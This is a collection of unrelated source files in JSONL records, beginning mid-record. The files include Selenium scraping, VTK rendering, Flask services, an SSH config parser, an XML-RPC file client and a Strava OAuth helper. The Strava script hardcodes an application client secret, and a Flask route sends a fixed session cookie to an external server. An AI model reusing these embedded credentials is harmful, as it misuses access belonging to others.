print(e)\n else:\n print('Could not load repository at ' + self.repo_path + '.')\n except BaseException as e:\n print(e)\n\n os.chdir(current_dir)\n\n","sub_path":"wrappers/GitWrapper.py","file_name":"GitWrapper.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"535985745","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass BBCPage():\n\n def __init__(self, driver):\n self.driver = driver\n self.openBBC()\n\n def openBBC(self):\n self.driver.get(\"http://bbc.com\")\n # assert \"BBC - Homepage\" in self.driver.title\n self.driver.implicitly_wait(3)\n\n def findMultipleElements(self):\n return self.driver.find_elements_by_tag_name(\"a\")\n\n def getNavigationLinks(self):\n nav_link = driver.find_element_by_id(\"orb-nav-links\")\n return nav_link.find_elements_by_tag_name(\"a\")\n\n\nclass RediffPage():\n\n def __init__(self, driver):\n self.driver = driver\n self.openRediff()\n\n def openRediff(self):\n self.driver.get(\"http://shopping.rediff.com/\")\n self.driver.implicitly_wait(20)\n\n def getProductCatLinks(self): \n nav_link = self.driver.find_element_by_xpath('id(\"popular_cat\")')\n return nav_link.find_elements_by_tag_name(\"a\")\n\n\ndef visitAllLinksSlow():\n driver = webdriver.Firefox()\n rediff = RediffPage(driver)\n l = len(elements)\n for i in range(l):\n e = elements[i]\n if e.is_displayed():\n e.click()\n print(driver.title + \"\\n\")\n rediff.openRediff()\n elements = rediff.getProductCatLinks()\n for e in elements:\n print(\"Navlinks: \", e.text)\n\n driver.close()\n\ndef visitAllLinksFast():\n driver = webdriver.Firefox()\n rediff = RediffPage(driver)\n l = len(rediff.getProductCatLinks())\n for i in range(1, 3):\n driver.find_element_by_xpath(\"id(\\\"popular_cat\\\")/h3[%d]/a[1]\" %(i)).click()\n print(driver.title)\n driver.back()\n\n driver.close()\n\nvisitAllLinksFast()","sub_path":"Selenium/selenium-bbc.py","file_name":"selenium-bbc.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112062434","text":"#!/usr/bin/env python\n\n# create pipeline\n#\nreader = vtk.vtkDataSetReader()\nreader.SetFileName(\"\" + str(VTK_DATA_ROOT) + \"/Data/RectGrid2.vtk\")\nreader.Update()\nwarper = vtk.vtkWarpVector()\nwarper.SetInputConnection(reader.GetOutputPort())\nwarper.SetScaleFactor(0.2)\nextract = vtk.vtkExtractGrid()\nextract.SetInputConnection(warper.GetOutputPort())\nextract.SetVOI(0,100,0,100,7,15)\nmapper = vtk.vtkDataSetMapper()\nmapper.SetInputConnection(extract.GetOutputPort())\nmapper.SetScalarRange(0.197813,0.710419)\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n# Graphics stuff\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(actor)\nren1.SetBackground(1,1,1)\nrenWin.SetSize(400,400)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.76213,10.712)\ncam1.SetFocalPoint(-0.0842503,-0.136905,0.610234)\ncam1.SetPosition(2.53813,2.2678,-5.22172)\ncam1.SetViewUp(-0.241047,0.930635,0.275343)\niren.Initialize()\n# render the image\n#\n# prevent the tk window from showing up then start the event loop\n# --- end of script --\n","sub_path":"Filters/General/Testing/Python/WarpVectorImage.py","file_name":"WarpVectorImage.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"249197645","text":"from app.main import db\r\nfrom app.main.model.valor import Valor\r\nfrom app.main.model.atributo import Atributo\r\nfrom app.main.model.tratamiento import Tratamiento\r\nfrom app.main.util.clases_auxiliares import ValorConsultar\r\nfrom app.main.util.dto import ValorDto\r\nfrom flask_restplus import marshal\r\n\r\n\r\n_valorConsultar = ValorDto.valorConsultar\r\n\r\n\r\ndef guardar_valor(valor):\r\n valor_consultar = (db.session.query(Valor)\r\n .filter(Valor.descripcion == valor['descripcion'])\r\n .filter(Valor.atributo_id == valor['atributo_id']).first())\r\n if not valor_consultar:\r\n nuevo_valor = Valor(\r\n descripcion= valor['descripcion'],\r\n atributo_id= valor['atributo_id']\r\n )\r\n guardar_cambios(nuevo_valor)\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo creado exitosamente'\r\n }\r\n return respuesta, 201\r\n else:\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'La descripcion del valor ya existe para este atributo'\r\n }\r\n return respuesta, 409\r\n\r\n\r\ndef editar_valor(data):\r\n valor = Valor.query.filter_by(id=data['id']).first()\r\n if not valor:\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'No existe el valor'\r\n }\r\n return respuesta, 409\r\n else:\r\n valor.descripcion = data['descripcion']\r\n guardar_cambios(valor)\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo editado exitosamente'\r\n }\r\n return respuesta, 201\r\n\r\n\r\ndef eliminar_valor(id):\r\n try:\r\n Valor.query.filter_by(id=id).delete()\r\n except:\r\n db.session.rollback()\r\n respuesta = {\r\n 'estado': 'fallido',\r\n 'mensaje': 'No existe el valor'\r\n }\r\n return respuesta, 409\r\n else:\r\n db.session.commit()\r\n respuesta = {\r\n 'estado': 'exito',\r\n 'mensaje': 'Atributo eliminado exitosamente'\r\n }\r\n return respuesta, 201\r\n\r\n\r\ndef obtener_valores_atributo(atributo_id):\r\n \"\"\" Obtiene los valores que pertenecen a un atributo\"\"\"\r\n valores = [ValorConsultar]\r\n valores_consultar = (db.session.query(Valor, Atributo, Tratamiento)\r\n .outerjoin(Atributo, Valor.atributo_id == Atributo.id)\r\n .outerjoin(Tratamiento, Atributo.tratamiento_id == Tratamiento.id)\r\n .filter(Valor.atributo_id == atributo_id).all())\r\n i = 0\r\n valores.clear()\r\n if not valores_consultar:\r\n return [], 201\r\n else:\r\n for item in valores_consultar:\r\n valores.insert(i, item[0])\r\n valores[i].tratamiento_id = item[2].id\r\n valores[i].color_primario = item[2].color_tratamiento.codigo\r\n i += 1\r\n return marshal(valores, ValorDto.valorConsultar) , 201\r\n\r\n\r\ndef obtener_valores_atributo_completo(atributo_id):\r\n \"\"\" Obtiene los valores de un atributo pero incluyendo el id de atributo y tratamiento padre y\r\n el color del tratamiento. Esta función es útil para presentar la vista de árbol de las herramientas de\r\n anotación y visualización\"\"\"\r\n valores = [ValorConsultar]\r\n valores_consultar = (db.session.query(Valor, Atributo, Tratamiento)\r\n .outerjoin(Atributo, Valor.atributo_id == Atributo.id)\r\n .outerjoin(Tratamiento, Atributo.tratamiento_id == Tratamiento.id)\r\n .filter(Valor.atributo_id == atributo_id).all())\r\n i = 0\r\n valores.clear()\r\n\r\n for item in valores_consultar:\r\n valores.insert(i, item[0])\r\n valores[i].tratamiento_id = item[2].id\r\n valores[i].color_primario = item[2].color_tratamiento.codigo\r\n i += 1\r\n return valores\r\n\r\n\r\ndef guardar_cambios(data):\r\n db.session.add(data)\r\n db.session.commit()\r\n","sub_path":"app/main/service/valor_service.py","file_name":"valor_service.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299454878","text":"import math \n\ndef obwod(x,y,z):\n ob=x+y+z\n return ob\n\ndef pole(x,y,z):\n p=(x+y+z)/2\n j=p*(p-x)*(p-y)*(p-z)\n k=math.sqrt(j)\n return k\n\ndef boki(x,y,z):\n if x==y:\n if y==z:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n elif x==z:\n if z==y:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n elif y==z:\n if z==x:\n return \"Równoboczny\"\n else:\n return \"Równoramienny\"\n else:\n return \"Różnoboczny\"\n\ndef kat(x,y,z):\n cosX=((y**2)+(z**2)-(x**2))/(2*y*z)\n cosY=((x**2)+(z**2)-(y**2))/(2*x*z)\n cosZ=((x**2)+(y**2)-(z**2))/(2*x*y)\n\n X=math.degrees((math.cos(cosX))**(-1))\n Y=math.degrees((math.cos(cosY))**(-1))\n Z=math.degrees((math.cos(cosZ))**(-1))\n\n if X < 90:\n if Y < 90:\n if Z < 90:\n kat=\"Ostrokątny\"\n return kat\n \n if X == 90:\n kat=\"Prostokątny\"\n return kat\n elif Y == 90:\n kat=\"Prostokątny\"\n return kat\n elif Z == 90:\n kat=\"Prostokątny\"\n return kat\n\n if X > 90:\n kat=\"Rozwartokątny\"\n return kat\n elif Y > 90:\n kat=\"Rozwartokątny\"\n return kat\n elif Z > 90:\n kat=\"Rozwartokątny\"\n return kat","sub_path":"lista6/trojkat.py","file_name":"trojkat.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220174760","text":"# -*- coding:utf-8 -*-\n# Copyright (C) 2003-2011 Robey Pointer \n#\n# This file is part of paramiko.\n#\n# Paramiko is free software; you can redistribute it and/or modify it under the\n# terms of the GNU Lesser General Public License as published by the Free\n# Software Foundation; either version 2.1 of the License, or (at your option)\n# any later version.\n#\n# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more\n# details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with Paramiko; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.\n\n\nimport re\n\n\nclass SSHDConfig(object):\n \"\"\"\n 主要用来解析/etc/ssh/sshd_config配置文件\n \"\"\"\n\n # 匹配规则,空格=空格或者多个空格\n SETTINGS_REGEX = re.compile(r'(\\w+)(?:\\s*=\\s*|\\s+)(.+)')\n\n def __init__(self):\n \"\"\"\n Create a new OpenSSH config object.\n \"\"\"\n self._sshd_config = {}\n\n def parse(self, file_name='/etc/ssh/sshd_config'):\n \"\"\"\n Read an OpenSSH config from the given file object.\n\n :param file_obj: a file-like object to read the config file from\n \"\"\"\n\n with open(file_name, 'r') as file_obj:\n\n for line in file_obj:\n # Strip any leading or trailing whitespace from the line.\n # See https://github.com/paramiko/paramiko/issues/499 for more info.\n line = line.strip()\n\n if not line or line.startswith('#'):\n\n continue\n\n match = re.match(self.SETTINGS_REGEX, line)\n if not match:\n raise Exception(\"Unparsable line %s\" % line)\n key = match.group(1)\n value = match.group(2)\n self._sshd_config[key] = value\n\n\ndef get_ssh_config(file_name):\n\n sshd_config = SSHDConfig()\n sshd_config.parse(file_name=file_name)\n return sshd_config._sshd_config\n\n\n","sub_path":"parse_config/parse_ssh_config.py","file_name":"parse_ssh_config.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19328218","text":"# leetcode 25 hard high freq\n\"\"\"\n重点是:\n1.dummy node\n2.reverse linked list\n3.每次k个部分都用head指向开头,两个指针,最后记得连接,这样才能把各个k部分连接在一起。\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n # dummy.next is always head 永远是当前的头\n dummy = ListNode(0)\n dummy.next = head \n \n head = dummy # 此时dummy已经储存了head的信息,所以为了少用一个变量,让head指向dummy\n while head:\n head = self.reverseNextK(head, k)\n \n return dummy.next\n \n \n def reverseNextK(self, head, k):\n # head -> n1->n2..nk->nk+1\n # =>\n # head ->nk->nk-1....n1->nk+1..\n # return n1\n n1 = head.next\n nk = head # n1, nk就相当于双指针一样,指着k个链表的开头和结尾\n for i in range(k):\n nk = nk.next\n if nk is None:\n return None # 不够k个,结束了\n pre = None\n cur = n1\n nkplus = nk.next\n while cur != nkplus:\n temp = cur.next\n cur.next = pre\n pre = cur\n cur = temp # reverse linked list\n \n # connect\n head.next = nk # 连接是因为要连接k个部分,则每次都有head和nkplus,最初的head正好是dummy node,最后返回dummy.next\n n1.next = nkplus\n \n return n1","sub_path":"LinkedList_and_array/Leetcode/25.Reverse_Nodes_in_k-Group.py","file_name":"25.Reverse_Nodes_in_k-Group.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"254605910","text":"import os\nimport xmlrpc.client\nfrom colorama import Fore\ns = xmlrpc.client.ServerProxy('http://192.168.1.76:8000/mis_archivos')\ncurrentPath = 'home/'\n\nwhile True:\n comando = input(Fore.MAGENTA + ('{}>'.format(currentPath,color='green')))\n argumentos = comando.split(' ')\n\n try:\n if argumentos[0] == 'create':\n print(Fore.LIGHTRED_EX + s.create(currentPath,argumentos[1]))\n elif argumentos[0] == 'read':\n print(Fore.LIGHTBLACK_EX + s.read(currentPath,argumentos[1]))\n elif argumentos[0] == 'write':\n if len(argumentos) > 3:\n argumentos[2] = ' '.join(argumentos[2:(len(argumentos))])\n print(Fore.LIGHTRED_EX + s.write(currentPath, argumentos[1], argumentos[2]))\n elif argumentos[0] == 'rename':\n print(Fore.LIGHTRED_EX + s.rename(currentPath,argumentos[1], argumentos[2]))\n elif argumentos[0] == 'rm':\n print(Fore.LIGHTRED_EX + s.remove(currentPath,argumentos[1]))\n elif argumentos[0] == 'mkdir':\n print(Fore.LIGHTRED_EX + s.createdir(currentPath,argumentos[1]))\n elif argumentos[0] == 'rmdir':\n print(Fore.LIGHTRED_EX + s.rmdir(currentPath,argumentos[1]))\n elif argumentos[0] == 'ls':\n print(Fore.LIGHTBLUE_EX + s.ls(currentPath))\n elif argumentos[0] == 'cd':\n currentPath = s.cd(currentPath,argumentos[1])\n elif argumentos[0] == '-h':\n print(Fore.LIGHTBLACK_EX + s.help())\n elif argumentos[0] == 'exit':\n exit(0)\n elif argumentos[0] == 'upload':\n if os.path.isfile(argumentos[1]):\n name = os.path.basename(argumentos[1])\n f = open(argumentos[1], 'rb')\n send = xmlrpc.client.Binary(f.read())\n print(s.upload(currentPath, name, send))\n else:\n print('No se encontó el archivo ' + argumentos[1])\n elif argumentos[0] == 'download':\n name = argumentos[1]\n try:\n if not os.path.exists(currentPath):\n os.makedirs(currentPath)\n with open(currentPath + name, 'wb') as f:\n f.write(s.download(currentPath, name).data)\n print(Fore.LIGHTRED_EX + 'Archivo guardado localmente')\n except (OSError, IOError):\n print(Fore.RED + 'No se encontró el archivo en el servidor')\n\n else:\n print(Fore.RED + 'No existe el comando')\n except (IndexError):\n print(Fore.RED + 'Argumentos faltantes (-h para ver todos los comandos disponibles)')","sub_path":"cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74503215","text":"\"\"\"\n\n task6_3_starter.py - Using the argparse Module\n\n This exercise is a refactoring of the task6_2.py solution. It\n proposes parsing command-line arguments to determine how many results to display.\n The following command line arguments shall be used:\n\n python task6_3_starter.py -c 5\n\n\t\t or\n\n python task6_3_starter.py --count 5\n\n\n Helpful hints:\n\n 1. Create a function called get_args() that instantiates the argparse\n parser and adds the -c and --count argument. Return the parsed args\n from this function.\n\n 2. Invoke the function, retrieving the parsed command-line arguments from\n the argparse parser.\n\n 3. Use the args.count property in a loop to display the most common countries\n\n\n\"\"\"\nimport os\nfrom collections import Counter\n\n\nworking_dir = '../resources'\ncity_data = 'cities15000.txt'\ncountry_info = 'countryInfo.txt'\n\n\ndef read_countries_generator():\n try:\n with open(os.path.join(working_dir, city_data), encoding='utf8') as cities_file:\n for line in cities_file:\n city_record = line.strip().split('\\t')\n country_code = city_record[8]\n yield country_code\n except IOError as e:\n print('Error: {0}'.format(e))\n\n\ndef read_country_names_generator():\n try:\n with open(os.path.join(working_dir, country_info), encoding='utf8') as countries_file:\n for idx, line in enumerate(countries_file):\n if idx > 50:\n country_record = line.strip().split('\\t')\n country_code = country_record[0]\n country_name = country_record[4]\n yield country_code, country_name\n except IOError as e:\n print('Error: {0}'.format(e))\n\n\ncountries_referenced = list(read_countries_generator())\ncountry_names = { code:name for code, name in read_country_names_generator()}\n\n# calculate the country with the most cities over 15000\nmost_common_countries = Counter(countries_referenced).most_common(2)\nmost_common, count = most_common_countries[0]\nsecond_most_common, second_count = most_common_countries[1]\n\nprint('Country with most cities over 15000 population: {0} with {1} cities.'\n .format(country_names[most_common], count))\nprint('Country with second most cities over 15000 population: {0} with {1} cities.'\n .format(country_names[second_most_common], second_count))\n","sub_path":"student_files/ch06_std_lib/task6_3_starter.py","file_name":"task6_3_starter.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372332633","text":"from flask import *\r\nfrom flask_wtf import FlaskForm #基类\r\nfrom wtforms import BooleanField,TextAreaField,StringField,PasswordField,RadioField,SelectField, IntegerField,SubmitField\r\nfrom . import searchclass#,auto_input\r\nfrom . import util\r\nfrom flask import session,g\r\nfrom whoosh import analysis\r\nimport calendar\r\nimport numpy as np\r\nimport time\r\nimport cv2\r\nimport requests\r\nhome = Blueprint(\"search_result\",__name__,url_prefix=\"/result\")\r\n\r\n@home.route('/',methods=['GET','POST'])\r\ndef display_result():\r\n s_time = time.time()\r\n if request.method == 'POST' and request.form.get('form_fill') :\r\n # click \"Fill the forms\"\r\n mySearch = searchclass.SearchClass()\r\n real_tags = {}\r\n text = request.form.get('text_input')\r\n if text:\r\n # [parsed_query,real_tags] = g.searcher.QueryParser(text,'info_dictionary_mar8.json')\r\n [parsed_query,real_tags] = mySearch.QueryParser(text,'info_dictionary_mar8.json')\r\n if 'query_term' in session:\r\n # session['query_term'] = util.merge(session['query_term'],parsed_query,session['parsed_query'])\r\n # print(session['query_term'],parsed_query,session['parsed_query'])\r\n session['this_parsed_query'] = parsed_query\r\n query_term = util.merge(session['query_term'],parsed_query,session['all_parsed_query'])\r\n else:\r\n # session['query_term'] = parsed_query\r\n session['this_parsed_query'] = parsed_query\r\n query_term = parsed_query\r\n session['all_parsed_query'] = {}\r\n # session['query_term']['text'] = text\r\n query_term['text'] = text\r\n # session['parsed_query'] = parsed_query\r\n session['real_tags'] = real_tags\r\n # session['js_query_term'] = util.js_query(query_term)\r\n form = dict(request.form)\r\n js_query_term = util.js_query(query_term,form.get(\"img_feedback\",\"\"),form.get(\"Tag_feedback\",\"\"))\r\n mySearch.__close__()\r\n print('query parse time: %f s'%(round(time.time()-s_time,2)))\r\n return render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n elif request.method == 'POST' and request.form.get('search') :\r\n # click \"Search\"\r\n mySearch = searchclass.SearchClass()\r\n this_query,img_feedback_str, tag_feedback_str= \\\r\n util.get_query_term(dict(request.form),{'shot_id':session['shot_id'],'result_key':session['result_key'],'extra_info':session[\"extra_info\"]})\r\n for key in this_query:\r\n if 'location' in key and type(this_query[key]) != dict:\r\n this_query[key] = list(set(this_query[key]))\r\n session['all_parsed_query'] = util.merge(session['all_parsed_query'],session['this_parsed_query'],session['all_parsed_query'])\r\n # [img_key_list, img_all_list,shot_id_dict,session['extra_info']] = g.searcher.QueryMain(util.add_tags(this_query,session['real_tags']))\r\n [img_key_list, img_all_list,shot_id_dict,session['extra_info']] = mySearch.QueryMain(util.add_tags(this_query,session['real_tags']),limit_num=15)\r\n mySearch.__close__()\r\n\r\n session['query_term'] = this_query\r\n # session[\"query_term\"][\"img_feedback_str\"] = img_feedback_str\r\n # session[\"query_term\"][\"tag_feedback_str\"] = tag_feedback_str\r\n session['query_term']['text'] = request.form.get('text_input')\r\n session['result_key'] = img_key_list\r\n session['result_all'] = img_all_list\r\n session['shot_id'] = shot_id_dict\r\n js_query_term = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n # session['js_query_term'] = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n print('search time: %f s'%(round(time.time()-s_time,2)))\r\n # print('query term:::')\r\n # print(session['query_term'])\r\n # print(session['js_query_term'])\r\n return render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n # return render_template('ResultPage.html',all_content={'js_query_term':session['js_query_term'],'result_key':session['result_key'],\r\n # 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n \r\n elif request.method == 'POST' and request.form.get('Submit'):\r\n form = dict(request.form)\r\n result_id = form[\"submit_id\"][0]\r\n print(result_id)\r\n if '.' in result_id:\r\n result_id = result_id.split('.')[0]\r\n url = 'https://vbs.itec.aau.at:9443/submit?item='+result_id\r\n log = requests.get(url=url,\r\n headers={'cookie':'JSESSIONID=node07ggovm6dts531kvtu1p2xhnst1.node0'})\r\n result = log.json()['description']\r\n this_query,img_feedback_str, tag_feedback_str= \\\r\n util.get_query_term(dict(request.form),{'shot_id':session['shot_id'],'result_key':session['result_key'],'extra_info':session[\"extra_info\"]})\r\n js_query_term = util.js_query(session['query_term'],img_feedback_str,tag_feedback_str)\r\n js_query_term[\"submit_id\"] = result_id\r\n js_query_term[\"submit_result\"] = result\r\n return render_template('ResultPage.html',all_content={'js_query_term':js_query_term,'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})\r\n else:\r\n session['js_query_term'] = util.js_query(session['query_term'])\r\n print(session['js_query_term'])\r\n return render_template('ResultPage.html',all_content={'js_query_term':session['js_query_term'],'result_key':session['result_key'],\r\n 'result_all':session['result_all'],'extra_info':session['extra_info']})","sub_path":"blueprints/ResultPage.py","file_name":"ResultPage.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645757781","text":"import http.server as _hs\nimport urllib.parse as _uparse\nimport subprocess as _subp\nimport threading as _threading\nimport requests as _rq\nimport os as _os\nimport os.path as _path\nimport configparser as _configp\nimport time as _time\n\n\nthis_old_garmin_id = 29665\nthis_old_garmin_secret='7832770c9dc5dd82b131746a436120470c4d35a2'\nthis_old_garmin_redirect_uri = 'http://localhost:8000'\nbrowser_path = r'\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\"'\n\n\ndef trace(t):\n\tprint('TRACE: {}'.format(t))\n\n\ndef message(t):\n\tprint(t)\n\n\ndef parse_parameters(url):\n\tparsed = _uparse.urlparse(url)\n\treturn _uparse.parse_qs(parsed.query)\t\n\n\n## Do not access while the server is running.\nserver_keeps_running = True\nauthorization_code = ''\n\n\nclass RequestHandler (_hs.BaseHTTPRequestHandler) :\n\tdef do_GET(self):\n\t\tself._generic_response()\n\t\ttrace('received response from authorizer')\n\t\tparams = parse_parameters(self.requestline)\n\t\tif 'code' in params:\n\t\t\tglobal authorization_code\n\t\t\tauthorization_code = params['code'][0]\n\t\t\ttrace('code is {}'.format(authorization_code))\n\t\t\tglobal server_keeps_running\n\t\telse:\n\t\t\ttrace('no code in response')\n\t\tserver_keeps_running = False\n\n\tdef log_request(self, code='-', size='-'):\n\t\tpass\n\n\tdef _generic_response(self):\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type', 'text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes('

This Old Garmin

', 'utf-8'))\n\n\ndef run_server():\n server_address = ('', 8000)\n httpd = _hs.HTTPServer(server_address, RequestHandler)\n trace('server is starting...')\n global server_keeps_running\n while server_keeps_running:\n \thttpd.handle_request()\n trace('server has stopped')\n\n\ndef launch_server():\n\tserver_thread = _threading.Thread(group=None, target=run_server)\n\tserver_thread.start()\n\treturn server_thread\n\n\ndef auth_uri():\n\tpage = 'https://www.strava.com/oauth/authorize'\n\tparameters = [\n\t\t('client_id', this_old_garmin_id),\n\t\t('response_type', 'code'),\n\t\t('redirect_uri', this_old_garmin_redirect_uri),\n\t\t('approval_prompt', 'auto'),\n\t\t('scope', 'activity:write')\n\t]\n\n\tparams_assign = ['{}={}'.format(k,v) for (k,v) in parameters]\n\n\treturn page + '?' + '&'.join(params_assign)\n\n\ndef get_authorization_code_request():\n\ttrace('getting authorization code from server')\n\tserver_thread = launch_server();\n\n\t_subp.call('{} {}'.format(browser_path, auth_uri()))\n\n\tserver_thread.join()\n\n\tglobal authorization_code\n\ttrace('got authorization code from server')\n\treturn authorization_code\n\n\ndef get_tokens_request(code):\n\ttrace('get tokens for the first time from the server')\n\tpage = 'https://www.strava.com/oauth/token'\n\tparams = {\n\t\t'client_id': this_old_garmin_id,\n\t\t'client_secret': this_old_garmin_secret,\n\t\t'code': code,\n\t\t'grant_type': 'authorization_code'\n\t}\n\n\tr = _rq.post(page, params=params)\t\n\tj = r.json()\n\n\treturn (\n\t\tj['refresh_token'], \n\t\tj['access_token'],\n\t\tstr(j['expires_at'])\n\t)\n\n\ndef refresh_tokens_request(refresh_token):\n\ttrace('refresh tokens from the server')\n\tpage = 'https://www.strava.com/oauth/token'\n\tparams = {\n\t\t'client_id': this_old_garmin_id,\n\t\t'client_secret': this_old_garmin_secret,\n\t\t'refresh_token': refresh_token,\n\t\t'grant_type': 'refresh_token'\n\t}\n\n\tr = _rq.post(page, params=params)\t\n\tj = r.json()\n\n\treturn (\n\t\tj['refresh_token'], \n\t\tj['access_token'],\n\t\tstr(j['expires_at'])\n\t)\n\n\ndef app_data_filename():\n\thome = _os.getenv('APPDATA')\n\treturn _path.join(home, 'this_old_garmin')\n\n\ndef read_app_data():\n\tapp_data = _configp.ConfigParser()\n\ttry:\n\t\tapp_data.read(app_data_filename())\n\texcept FileNotFoundError:\n\t\ttrace('application data file not found')\n\treturn app_data\n\n\ndef write_app_data(app_data):\n\twith open(app_data_filename(), 'w') as f:\n\t\tapp_data.write(f)\n\n\ndef is_access_token_valid(ac, ex):\n\n\ttry:\n\t\texpires_at_epoch = float(ex)\n\t\tnow_epoch = _time.time()\n\t\ttoo_close = 5 * 60 # five minutes\n\n\t\tif now_epoch + too_close > expires_at_epoch:\n\t\t\treturn False\n\texcept ValueError:\n\t\treturn False\n\n\treturn ac != ''\n\n\ndef is_refresh_token_valid(rf):\n\treturn rf != ''\n\n\ndef is_code_valid(co):\n\treturn co != ''\n\n\ndef update_tokens(section, tokens):\n\tsection['refresh_token'] = tokens[0]\n\tsection['access_token'] = tokens[1]\n\tsection['expires_at'] = tokens[2]\n\n\ndef prepare_access_token(section):\n\taccess_token = section.get('access_token', '')\t\n\texpires_at = section.get('expires_at', '')\t\n\n\tif not is_access_token_valid(access_token, expires_at):\n\t\tget_access_token(section)\n\n\ttrace('access token is {}'.format(section['access_token']))\n\n\ndef get_access_token(section):\n\t# access token is invalid or expired\n\trefresh_token = section.get('refresh_token', '')\n\n\tif is_refresh_token_valid(refresh_token):\n\t\ttokens = refresh_tokens_request(refresh_token)\n\t\tupdate_tokens(section, tokens)\n\telse:\n\t\tget_tokens_from_authorization_code(section)\n\n\ndef get_tokens_from_authorization_code(section):\n\t# refresh and access tokens are invalid\n\tcode = section.get('code', '')\n\n\tif not is_code_valid(code):\n\t\tcode = get_authorization_code_request()\n\t\tsection['code'] = code\n\n\ttokens = get_tokens_request(code)\n\n\tupdate_tokens(section, tokens)\n\n\ndef get_section(configp, name):\n\ttry:\n\t\treturn configp[name]\n\texcept KeyError:\n\t\tconfigp.add_section(name)\n\t\treturn configp[name]\n\n\ndef main():\n\tapp_data = read_app_data()\n\n\tauthorization_section = get_section(app_data, 'authorization')\n\n\tprepare_access_token(authorization_section)\n\n\twrite_app_data(app_data)\n\n\t# TODO get data from Garmin unit\n\t# TODO push data to site with access token\n\nif __name__ == \"__main__\": \n\tmain()\n","sub_path":"this_old_garmin.py","file_name":"this_old_garmin.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457486192","text":"from graph_knn import distancia_euclidiana\n\ndef busca_A(grafo, inicio, fim):\n print(\"BUSCA BEST FIRST\")\n\n vertices = grafo.get_vertices()\n\n pilha = [inicio]\n visitados = [inicio]\n # antecessores = [-1]\n distancia_percorrida = 0\n distancia_caminho = -1\n caminho = []\n while pilha:\n vertice_antecessor = pilha[-1]\n print(\"Pilha:\", pilha, \"Distancia:\", distancia_percorrida)\n\n for aresta in vertices[vertice_antecessor].get_arestas():\n if aresta[0] not in visitados:\n pilha.append(aresta[0])\n distancia_percorrida += aresta[1]\n if aresta[0] == fim:\n print(\"Caminho: \", pilha, \"Distancia:\", distancia_percorrida)\n if not caminho or distancia_percorrida < distancia_caminho or len(pilha) < len(caminho):\n print(\"Novo caminho\\n\")\n caminho = pilha.copy()\n distancia_caminho = distancia_percorrida\n distancia_percorrida -= aresta[1]\n pilha.pop()\n pilha.pop()\n else:\n visitados.append(aresta[0])\n\n break\n\n if aresta == vertices[vertice_antecessor].arestas[-1]:\n distancia_percorrida -= aresta[1]\n pilha.pop()\n\n\n if not caminho:\n print(f\"Não possui caminho de {inicio} até {fim}. :(\")\n else:\n print(\"Tem caminho!\")\n print(caminho)\n\n print()\n return caminho\n ","sub_path":"auxs/busca_aux.py","file_name":"busca_aux.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 